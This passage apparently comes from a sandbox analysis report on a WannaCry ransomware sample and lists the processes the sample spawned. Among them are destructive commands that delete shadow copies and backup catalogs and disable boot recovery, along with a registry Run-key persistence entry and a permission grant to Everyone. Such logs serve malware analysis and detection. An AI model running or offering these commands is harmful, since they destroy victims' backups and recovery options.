              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h .
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q
              Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 58191711205328.bat
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe co
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c start /b @WanaDecryptor@.exe vs
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "whprujwpxi808" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe vs
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "whprujwpxi808" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\System32\consent.exe consent.exe 5728 686 000001FA36427DE0
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exe TaskData\Tor\taskhsvc.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\System32\VSSVC.exe C:\Windows\system32\vssvc.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe taskdl.exe
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe @WanaDecryptor@.exe
